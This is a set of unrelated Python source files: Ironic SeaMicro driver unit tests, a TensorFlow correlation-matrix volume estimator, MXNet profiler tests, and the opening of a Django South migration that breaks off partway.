mock_get_server.return_value = self.Server(active=True)
pstate = seamicro._power_off(self.node)
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_off_fail(self, mock_get_server):
def fake_power_off():
return
server = self.Server(active=True)
server.power_off = fake_power_off
mock_get_server.return_value = server
pstate = seamicro._power_off(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__reboot_good(self, mock_get_server):
mock_get_server.return_value = self.Server(active=True)
pstate = seamicro._reboot(self.node)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__reboot_fail(self, mock_get_server):
def fake_reboot():
return
server = self.Server(active=False)
server.reset = fake_reboot
mock_get_server.return_value = server
pstate = seamicro._reboot(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_volume")
def test__validate_fail(self, mock_get_volume):
info = seamicro._parse_driver_info(self.node)
volume_id = "0/p6-6/vol1"
volume = self.Volume()
volume.id = volume_id
mock_get_volume.return_value = volume
self.assertRaises(exception.InvalidParameterValue,
seamicro._validate_volume, info, volume_id)
@mock.patch.object(seamicro, "_get_volume")
def test__validate_good(self, mock_get_volume):
info = seamicro._parse_driver_info(self.node)
volume = self.Volume()
mock_get_volume.return_value = volume
valid = seamicro._validate_volume(info, volume.id)
self.assertEqual(valid, True)
@mock.patch.object(seamicro, "_get_pools")
def test__create_volume_fail(self, mock_get_pools):
info = seamicro._parse_driver_info(self.node)
mock_get_pools.return_value = None
self.assertRaises(exception.IronicException,
seamicro._create_volume,
info, 2)
@mock.patch.object(seamicro, "_get_pools")
@mock.patch.object(seamicro, "_get_client")
def test__create_volume_good(self, mock_get_client, mock_get_pools):
info = seamicro._parse_driver_info(self.node)
pools = [self.Pool(1), self.Pool(6), self.Pool(5)]
get_pools_patcher = mock.patch.object(mock_get_client, "volume.create")
get_pools_patcher.start()
mock_get_pools.return_value = pools
seamicro._create_volume(info, 2)
get_pools_patcher.stop()
class SeaMicroPowerDriverTestCase(db_base.DbTestCase):
def setUp(self):
super(SeaMicroPowerDriverTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_seamicro')
self.driver = driver_factory.get_driver('fake_seamicro')
self.node = obj_utils.create_test_node(self.context,
driver='fake_seamicro',
driver_info=INFO_DICT)
self.get_server_patcher = mock.patch.object(seamicro, '_get_server')
self.get_server_mock = None
self.Server = Fake_Server
self.Volume = Fake_Volume
def test_get_properties(self):
expected = seamicro.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
self.assertEqual(expected, task.driver.get_properties())
@mock.patch.object(seamicro, '_parse_driver_info')
def test_power_interface_validate_good(self, parse_drv_info_mock):
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
task.driver.power.validate(task)
self.assertEqual(1, parse_drv_info_mock.call_count)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_power_interface_validate_fails(self, parse_drv_info_mock):
side_effect = exception.InvalidParameterValue("Bad input")
parse_drv_info_mock.side_effect = side_effect
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.validate, task)
self.assertEqual(1, parse_drv_info_mock.call_count)
@mock.patch.object(seamicro, '_reboot')
def test_reboot(self, mock_reboot):
info = seamicro._parse_driver_info(self.node)
mock_reboot.return_value = states.POWER_ON
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.power.reboot(task)
mock_reboot.assert_called_once_with(task.node)
def test_set_power_state_bad_state(self):
info = seamicro ._parse_driver_info(self.node)
self.get_server_mock = self.get_server_patcher.start()
self.get_server_mock.return_value = self.Server()
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.IronicException,
task.driver.power.set_power_state,
task, "BAD_PSTATE")
self.get_server_patcher.stop()
@mock.patch.object(seamicro, '_power_on')
def test_set_power_state_on_good(self, mock_power_on):
info = seamicro._parse_driver_info(self.node)
mock_power_on.return_value = states.POWER_ON
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_ON)
mock_power_on.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_power_on')
def test_set_power_state_on_fail(self, mock_power_on):
info = seamicro._parse_driver_info(self.node)
mock_power_on.return_value = states.POWER_OFF
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_ON)
mock_power_on.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_power_off')
def test_set_power_state_off_good(self, mock_power_off):
info = seamicro._parse_driver_info(self.node)
mock_power_off.return_value = states.POWER_OFF
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_OFF)
mock_power_off.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_power_off')
def test_set_power_state_off_fail(self, mock_power_off):
info = seamicro._parse_driver_info(self.node)
mock_power_off.return_value = states.POWER_ON
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_OFF)
mock_power_off.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_vendor_passthru_validate_good(self, mock_info):
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
for method in seamicro.VENDOR_PASSTHRU_METHODS:
task.driver.vendor.validate(task, **{'method': method})
self.assertEqual(len(seamicro.VENDOR_PASSTHRU_METHODS),
mock_info.call_count)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_vendor_passthru_validate_fail(self, mock_info):
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, **{'method': 'invalid_method'})
self.assertFalse(mock_info.called)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_vendor_passthru_validate_parse_driver_info_fail(self, mock_info):
mock_info.side_effect = exception.InvalidParameterValue("bad")
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
method = seamicro.VENDOR_PASSTHRU_METHODS[0]
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, **{'method': method})
mock_info.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_get_server')
def test_set_node_vlan_id_good(self, mock_get_server):
info = seamicro._parse_driver_info(self.node)
vlan_id = "12"
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'vlan_id': vlan_id, 'method': 'set_node_vlan_id'}
task.driver.vendor.vendor_passthru(task, **kwargs)
mock_get_server.assert_called_once_with(info)
def test_set_node_vlan_id_no_input(self):
info = seamicro._parse_driver_info(self.node)
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.vendor_passthru,
task,
**{'method': 'set_node_vlan_id'})
@mock.patch.object(seamicro, '_get_server')
def test_set_node_vlan_id_fail(self, mock_get_server):
def fake_set_untagged_vlan(self, **kwargs):
raise seamicro_client_exception.ClientException(500)
info = seamicro._parse_driver_info(self.node)
vlan_id = "12"
server = self.Server(active="true")
server.set_untagged_vlan = fake_set_untagged_vlan
mock_get_server.return_value = server
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'vlan_id': vlan_id, 'method': 'set_node_vlan_id'}
self.assertRaises(exception.IronicException,
task.driver.vendor.vendor_passthru,
task,
**kwargs)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_validate_volume')
def test_attach_volume_with_volume_id_good(self, mock_validate_volume,
mock_get_server):
info = seamicro._parse_driver_info(self.node)
volume_id = '0/ironic-p6-1/vol1'
mock_validate_volume.return_value = True
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_id': volume_id, 'method': 'attach_volume'}
task.driver.vendor.vendor_passthru(task, **kwargs)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_get_volume')
def test_attach_volume_with_invalid_volume_id_fail(self,
mock_get_volume,
mock_get_server):
info = seamicro._parse_driver_info(self.node)
volume_id = '0/p6-1/vol1'
mock_get_volume.return_value = self.Volume(volume_id)
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_id': volume_id, 'method': 'attach_volume'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.vendor_passthru,
task,
**kwargs)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_validate_volume')
def test_attach_volume_fail(self, mock_validate_volume,
mock_get_server):
def fake_attach_volume(self, **kwargs):
raise seamicro_client_exception.ClientException(500)
info = seamicro._parse_driver_info(self.node)
volume_id = '0/p6-1/vol1'
mock_validate_volume.return_value = True
server = self.Server(active="true")
server.attach_volume = fake_attach_volume
mock_get_server.return_value = server
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_id': volume_id, 'method': 'attach_volume'}
self.assertRaises(exception.IronicException,
task.driver.vendor.vendor_passthru,
task,
**kwargs)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_validate_volume')
@mock.patch.object(seamicro, '_create_volume')
def test_attach_volume_with_volume_size_good(self, mock_create_volume,
mock_validate_volume,
mock_get_server):
info = seamicro._parse_driver_info(self.node)
volume_id = '0/ironic-p6-1/vol1'
volume_size = 2
mock_create_volume.return_value = volume_id
mock_validate_volume.return_value = True
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_size': volume_size, 'method': "attach_volume"}
task.driver.vendor.vendor_passthru(task, **kwargs)
mock_get_server.assert_called_once_with(info)
mock_create_volume.assert_called_once_with(info, volume_size)
def test_attach_volume_with_no_input_fail(self):
info = seamicro._parse_driver_info(self.node)
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.vendor_passthru, task,
**{'method': 'attach_volume'})
@mock.patch.object(seamicro, '_get_server')
def test_set_boot_device_good(self, mock_get_server):
info = seamicro._parse_driver_info(self.node)
boot_device = "disk"
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.management.set_boot_device(task, boot_device)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
def test_set_boot_device_invalid_device_fail(self, mock_get_server):
info = seamicro._parse_driver_info(self.node)
boot_device = "invalid_device"
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.management.set_boot_device,
task, boot_device)
@mock.patch.object(seamicro, '_get_server')
def test_set_boot_device_fail(self, mock_get_server):
def fake_set_boot_order(self, **kwargs):
raise seamicro_client_exception.ClientException(500)
info = seamicro._parse_driver_info(self.node)
boot_device = "pxe"
server = self.Server(active="true")
server.set_boot_order = fake_set_boot_order
mock_get_server.return_value = server
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.IronicException,
task.driver.management.set_boot_device,
task, boot_device)
mock_get_server.assert_called_once_with(info)
def test_management_interface_get_supported_boot_devices(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
expected = [boot_devices.PXE, boot_devices.DISK]
self.assertEqual(sorted(expected), sorted(task.driver.management.
get_supported_boot_devices()))
def test_management_interface_get_boot_device(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
expected = {'boot_device': None, 'persistent': None}
self.assertEqual(expected,
task.driver.management.get_boot_device(task))
def test_management_interface_validate_good(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.management.validate(task)
def test_management_interface_validate_fail(self):
# Missing SEAMICRO driver_info information
node = obj_utils.create_test_node(self.context, id=2,
uuid=utils.generate_uuid(),
driver='fake_seamicro')
with task_manager.acquire(self.context, node.uuid) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.management.validate, task)
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimating the volume of the correlation matrices with bounded determinant.
Why? Because lkj_test.py tests the sampler for the LKJ distribution
by estimating the same volume another way.
How? Rejection sampling. Or, more precisely, importance sampling,
proposing from the uniform distribution on symmetric matrices with
diagonal 1s and entries in [-1, 1]. Such a matrix is a correlation
matrix if and only if it is also positive semi-definite.
The samples can then be converted into a confidence interval on the
volume in question by the [Clopper-Pearson
method](https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval),
also implemented here.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import sys
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import uniform
from tensorflow.python.ops.distributions import util
from tensorflow.python.platform import tf_logging
__all__ = [
"correlation_matrix_volume_rejection_samples",
"compute_true_volumes",
]
def try_import(name): # pylint: disable=invalid-name
module = None
try:
module = importlib.import_module(name)
except ImportError as e:
tf_logging.warning("Could not import %s: %s" % (name, str(e)))
return module
optimize = try_import("scipy.optimize")
stats = try_import("scipy.stats")
def _psd_mask(x):
"""Computes whether each square matrix in the input is positive semi-definite.
Args:
x: A floating-point `Tensor` of shape `[B1, ..., Bn, M, M]`.
Returns:
mask: A floating-point `Tensor` of shape `[B1, ... Bn]`. Each
scalar is 1 if the corresponding matrix was PSD, otherwise 0.
"""
# Allegedly
# https://scicomp.stackexchange.com/questions/12979/testing-if-a-matrix-is-positive-semi-definite
# it is more efficient to test for positive semi-definiteness by
# trying to compute the Cholesky decomposition -- the matrix is PSD
# if you succeed and not PSD if you fail. However, TensorFlow's
# Cholesky raises an exception if _any_ of the input matrices are
# not PSD, from which I don't know how to extract _which ones_, so I
# proceed by explicitly computing all the eigenvalues and checking
# whether they are all positive or not.
#
# Also, as was discussed in the answer, it is somewhat dangerous to
# treat SPD-ness as binary in floating-point arithmetic. Cholesky
# factorization can complete and 'look' like everything is fine
# (e.g., O(1) entries and a diagonal of all ones) but the matrix can
# have an exponential condition number.
eigenvalues, _ = linalg_ops.self_adjoint_eig(x)
return math_ops.cast(
math_ops.reduce_min(eigenvalues, axis=-1) >= 0, dtype=x.dtype)
def _det_large_enough_mask(x, det_bounds):
"""Returns whether the input matches the given determinant limit.
Args:
x: A floating-point `Tensor` of shape `[B1, ..., Bn, M, M]`.
det_bounds: A floating-point `Tensor` that must broadcast to shape
`[B1, ..., Bn]`, giving the desired lower bound on the
determinants in `x`.
Returns:
mask: A floating-point `Tensor` of shape [B1, ..., Bn]. Each
scalar is 1 if the corresponding matrix had determinant above
the corresponding bound, otherwise 0.
"""
# For the curious: I wonder whether it is possible and desirable to
# use a Cholesky decomposition-based algorithm for this, since the
# only matrices whose determinant this code cares about will be PSD.
# Didn't figure out how to code that in TensorFlow.
#
# Expert opinion is that it would be about twice as fast since
# Cholesky is roughly half the cost of Gaussian Elimination with
# Partial Pivoting. But this is less of an impact than the switch in
# _psd_mask.
return math_ops.cast(
linalg_ops.matrix_determinant(x) > det_bounds, dtype=x.dtype)
def _uniform_correlation_like_matrix(num_rows, batch_shape, dtype, seed):
"""Returns a uniformly random `Tensor` of "correlation-like" matrices.
A "correlation-like" matrix is a symmetric square matrix with all entries
between -1 and 1 (inclusive) and 1s on the main diagonal. Of these,
the ones that are positive semi-definite are exactly the correlation
matrices.
Args:
num_rows: Python `int` dimension of the correlation-like matrices.
batch_shape: `Tensor` or Python `tuple` of `int` shape of the
batch to return.
dtype: `dtype` of the `Tensor` to return.
seed: Random seed.
Returns:
matrices: A `Tensor` of shape `batch_shape + [num_rows, num_rows]`
and dtype `dtype`. Each entry is in [-1, 1], and each matrix
along the bottom two dimensions is symmetric and has 1s on the
main diagonal.
"""
num_entries = num_rows * (num_rows + 1) / 2
ones = array_ops.ones(shape=[num_entries], dtype=dtype)
# It seems wasteful to generate random values for the diagonal since
# I am going to throw them away, but `fill_triangular` fills the
# diagonal, so I probably need them.
# It's not impossible that it would be more efficient to just fill
# the whole matrix with random values instead of messing with
# `fill_triangular`. Then would need to filter almost half out with
# `matrix_band_part`.
unifs = uniform.Uniform(-ones, ones).sample(batch_shape, seed=seed)
tril = util.fill_triangular(unifs)
symmetric = tril + array_ops.matrix_transpose(tril)
diagonal_ones = array_ops.ones(
shape=util.pad(batch_shape, axis=0, back=True, value=num_rows),
dtype=dtype)
return array_ops.matrix_set_diag(symmetric, diagonal_ones)
def correlation_matrix_volume_rejection_samples(
det_bounds, dim, sample_shape, dtype, seed):
"""Returns rejection samples from trying to get good correlation matrices.
The proposal being rejected from is the uniform distribution on
"correlation-like" matrices. We say a matrix is "correlation-like"
if it is a symmetric square matrix with all entries between -1 and 1
(inclusive) and 1s on the main diagonal. Of these, the ones that
are positive semi-definite are exactly the correlation matrices.
The rejection algorithm, then, is to sample a `Tensor` of
`sample_shape` correlation-like matrices of dimensions `dim` by
`dim`, and check each one for (i) being a correlation matrix (i.e.,
PSD), and (ii) having determinant at least the corresponding entry
of `det_bounds`.
Args:
det_bounds: A `Tensor` of lower bounds on the determinants of
acceptable matrices. The shape must broadcast with `sample_shape`.
dim: A Python `int` dimension of correlation matrices to sample.
sample_shape: Python `tuple` of `int` shape of the samples to
compute, excluding the two matrix dimensions.
dtype: The `dtype` in which to do the computation.
seed: Random seed.
Returns:
weights: A `Tensor` of shape `sample_shape`. Each entry is 0 if the
corresponding matrix was not a correlation matrix, or had too
small of a determinant. Otherwise, the entry is the
multiplicative inverse of the density of proposing that matrix
uniformly, i.e., the volume of the set of `dim` by `dim`
correlation-like matrices.
volume: The volume of the set of `dim` by `dim` correlation-like
matrices.
"""
with ops.name_scope("rejection_sampler"):
rej_proposals = _uniform_correlation_like_matrix(
dim, sample_shape, dtype, seed=seed)
rej_proposal_volume = 2. ** (dim * (dim - 1) / 2.)
# The density of proposing any given point is 1 / rej_proposal_volume;
# The weight of that point should be scaled by
# 1 / density = rej_proposal_volume.
rej_weights = rej_proposal_volume * _psd_mask(
rej_proposals) * _det_large_enough_mask(rej_proposals, det_bounds)
return rej_weights, rej_proposal_volume
def _clopper_pearson_confidence_interval(samples, error_rate):
"""Computes a confidence interval for the mean of the given 1-D distribution.
Assumes (and checks) that the given distribution is Bernoulli, i.e.,
takes only two values. This licenses using the CDF of the binomial
distribution for the confidence, which is tighter (for extreme
probabilities) than the DKWM inequality. The method is known as the
[Clopper-Pearson method]
(https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval).
Assumes:
- The given samples were drawn iid from the distribution of interest.
- The given distribution is a Bernoulli, i.e., supported only on
low and high.
Guarantees:
- The probability (over the randomness of drawing the given sample)
that the true mean is outside the returned interval is no more
than the given error_rate.
Args:
samples: `np.ndarray` of samples drawn iid from the distribution
of interest.
error_rate: Python `float` admissible rate of mistakes.
Returns:
low: Lower bound of confidence interval.
high: Upper bound of confidence interval.
Raises:
ValueError: If `samples` has rank other than 1 (batch semantics
are not implemented), or if `samples` contains values other than
`low` or `high` (as that makes the distribution not Bernoulli).
"""
# TODO(b/78025336) Migrate this confidence interval function
# to statistical_testing.py. In order to do that
# - Get the binomial CDF from the Binomial distribution
# - Implement scalar root finding in TF. Batch bisection search
# shouldn't be too hard, and is definitely good enough for this
# problem. Batching the Brent algorithm (from scipy) that is used
# here may be more involved, but may also not be necessary---it's
# only used here because scipy made it convenient. In particular,
# robustness is more important than speed here, which may make
# bisection search actively better.
# - The rest is just a matter of rewriting in the appropriate style.
if optimize is None or stats is None:
raise ValueError(
"Scipy is required for computing Clopper-Pearson confidence intervals")
if len(samples.shape) != 1:
raise ValueError("Batch semantics not implemented")
n = len(samples)
low = np.amin(samples)
high = np.amax(samples)
successes = np.count_nonzero(samples - low)
failures = np.count_nonzero(samples - high)
if successes + failures != n:
uniques = np.unique(samples)
msg = ("Purportedly Bernoulli distribution had distinct samples"
" {}, {}, and {}".format(uniques[0], uniques[1], uniques[2]))
raise ValueError(msg)
def p_small_enough(p):
prob = stats.binom.logcdf(successes, n, p)
return prob - np.log(error_rate / 2.)
def p_big_enough(p):
prob = stats.binom.logsf(successes, n, p)
return prob - np.log(error_rate / 2.)
high_p = optimize.brentq(
p_small_enough, float(successes) / n, 1., rtol=1e-9)
low_p = optimize.brentq(
p_big_enough, 0., float(successes) / n, rtol=1e-9)
low_interval = low + (high - low) * low_p
high_interval = low + (high - low) * high_p
return (low_interval, high_interval)
def compute_true_volumes(
det_bounds, dim, num_samples, error_rate=1e-6, seed=42):
"""Returns confidence intervals for the desired correlation matrix volumes.
The confidence intervals are computed by the [Clopper-Pearson method]
(https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval).
Args:
det_bounds: A rank-1 numpy array of lower bounds on the
determinants of acceptable matrices. Entries must be unique.
dim: A Python `int` dimension of correlation matrices to sample.
num_samples: The number of samples to draw.
error_rate: The statistical significance of the returned
confidence intervals. The significance is broadcast: Each
returned interval separately may be incorrect with probability
(under the sample of correlation-like matrices drawn internally)
at most `error_rate`.
seed: Random seed.
Returns:
bounds: A Python `dict` mapping each determinant bound to the low, high
tuple giving the confidence interval.
"""
bounds = {}
with session.Session() as sess:
rej_weights, _ = correlation_matrix_volume_rejection_samples(
det_bounds, dim, [num_samples, len(det_bounds)], np.float32, seed=seed)
rej_weights = sess.run(rej_weights)
for rw, det in zip(np.rollaxis(rej_weights, 1), det_bounds):
template = ("Estimating volume of {}x{} correlation "
"matrices with determinant >= {}.")
print(template.format(dim, dim, det))
sys.stdout.flush()
bounds[det] = _clopper_pearson_confidence_interval(
rw, error_rate=error_rate)
return bounds
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import logging
import mxnet as mx
from mxnet import profiler
import time
import os
from nose.tools import with_setup
from nose import SkipTest
def enable_profiler(profile_filename, run=True, continuous_dump=False, aggregate_stats=False):
profiler.set_config(profile_symbolic=True,
profile_imperative=True,
profile_memory=True,
profile_api=True,
filename=profile_filename,
continuous_dump=continuous_dump,
aggregate_stats=aggregate_stats
)
print('profile file save to {}'.format(profile_filename))
if run is True:
profiler.set_state('run')
# Perform a check to see if the platform was compiled with USE_PROFILER=1
def check_if_supported():
# If profiler support is absent, domain handle will be None
try:
domain = profiler.Domain(name='PythonDomain')
if domain.handle.value is None:
raise SkipTest('compile with USE_PROFILER=1 to enable this test.')
except:
raise SkipTest('compile with USE_PROFILER=1 to enable this test.')
@with_setup(check_if_supported)
def test_profiler():
iter_num = 5
begin_profiling_iter = 2
end_profiling_iter = 4
enable_profiler('test_profiler.json', False, False)
A = mx.sym.Variable('A')
B = mx.sym.Variable('B')
C = mx.symbol.dot(A, B)
executor = C.simple_bind(mx.cpu(1), 'write', A=(4096, 4096), B=(4096, 4096))
a = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
b = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
a.copyto(executor.arg_dict['A'])
b.copyto(executor.arg_dict['B'])
print("execution begin")
for i in range(iter_num):
print("Iteration {}/{}".format(i + 1, iter_num))
if i == begin_profiling_iter:
t0 = time.clock()
profiler.set_state('run')
if i == end_profiling_iter:
t1 = time.clock()
profiler.set_state('stop')
executor.forward()
c = executor.outputs[0]
c.wait_to_read()
print("execution end")
duration = t1 - t0
print('duration: {0}s'.format(duration))
print(' {0}ms/operator'.format(duration*1000/iter_num))
profiler.dump(True)
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_create_domain():
enable_profiler('test_profile_create_domain.json')
domain = profiler.Domain(name='PythonDomain')
print("Domain created: {}".format(str(domain)))
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_create_domain_dept():
profiler.set_config(profile_symbolic=True, filename='test_profile_create_domain_dept.json')
profiler.set_state('run')
domain = profiler.Domain(name='PythonDomain')
print("Domain created: {}".format(str(domain)))
profiler.dump()
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_task():
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog():
template, objects = makeParams()
for _ in range(100000):
logging.info(template.format(*objects))
logging.basicConfig()
enable_profiler('test_profile_task.json')
python_domain = profiler.Domain('PythonDomain::test_profile_task')
task = profiler.Task(python_domain, "test_profile_task")
task.start()
start = time.time()
var = mx.nd.ones((1000, 500))
doLog()
var.asnumpy()
stop = time.time()
task.stop()
print('run took: %.3f' % (stop - start))
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_frame():
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog():
template, objects = makeParams()
for _ in range(100000):
logging.info(template.format(*objects))
logging.basicConfig()
enable_profiler('test_profile_frame.json')
python_domain = profiler.Domain('PythonDomain::test_profile_frame')
frame = profiler.Frame(python_domain, "test_profile_frame")
frame.start()
start = time.time()
var = mx.nd.ones((1000, 500))
doLog()
var.asnumpy()
stop = time.time()
frame.stop()
print('run took: %.3f' % (stop - start))
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_event(do_enable_profiler=True):
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog():
template, objects = makeParams()
for _ in range(100000):
logging.info(template.format(*objects))
logging.basicConfig()
if do_enable_profiler is True:
enable_profiler('test_profile_event.json')
event = profiler.Event("test_profile_event")
event.start()
start = time.time()
var = mx.nd.ones((1000, 500))
doLog()
var.asnumpy()
stop = time.time()
event.stop()
print('run took: %.3f' % (stop - start))
if do_enable_profiler is True:
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_tune_pause_resume():
enable_profiler('test_profile_tune_pause_resume.json')
profiler.pause()
# "test_profile_task" should *not* show up in tuning analysis
test_profile_task()
profiler.resume()
# "test_profile_event" should show up in tuning analysis
test_profile_event()
profiler.pause()
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_counter(do_enable_profiler=True):
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog(counter):
template, objects = makeParams()
range_size = 100000
for i in range(range_size):
if i <= range_size / 2:
counter += 1
else:
counter -= 1
logging.info(template.format(*objects))
if do_enable_profiler is True:
enable_profiler('test_profile_counter.json')
python_domain = profiler.Domain('PythonDomain::test_profile_counter')
counter = profiler.Counter(python_domain, "PythonCounter::test_profile_counter")
counter.set_value(5)
counter += 1
start = time.time()
doLog(counter)
stop = time.time()
print('run took: %.3f' % (stop - start))
if do_enable_profiler is True:
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_continuous_profile_and_instant_marker():
file_name = 'test_continuous_profile_and_instant_marker.json'
enable_profiler(file_name, True, True, True)
python_domain = profiler.Domain('PythonDomain::test_continuous_profile')
last_file_size = 0
for i in range(5):
profiler.Marker(python_domain, "StartIteration-" + str(i)).mark('process')
print("{}...".format(i))
test_profile_event(False)
test_profile_counter(False)
profiler.dump(False)
# File size should keep increasing
new_file_size = os.path.getsize(file_name)
assert new_file_size >= last_file_size
last_file_size = new_file_size
profiler.dump(False)
debug_str = profiler.dumps()
assert(len(debug_str) > 0)
print(debug_str)
profiler.set_state('stop')
if __name__ == '__main__':
import nose
nose.runmodule()
|
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contract.summ_mo_money'
db.add_column(u'build_contract', 'summ_mo_money',
self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
keep_default=False)
# Adding field 'Contract.summ_without_mo_money'
db.add_column(u'build_contract', 'summ_without_mo_money',
self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Contract.summ_mo_money'
db.delete_column(u'build_contract', 'summ_mo_money')
# Deleting field 'Contract.summ_without_mo_money'
db.delete_column(u'build_contract', 'summ_without_mo_money')
models = {
'build.building': {
'Meta': {'object_name': 'Building'},
'address': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'approve_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'cad_num': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048', 'db_index': 'True'}),
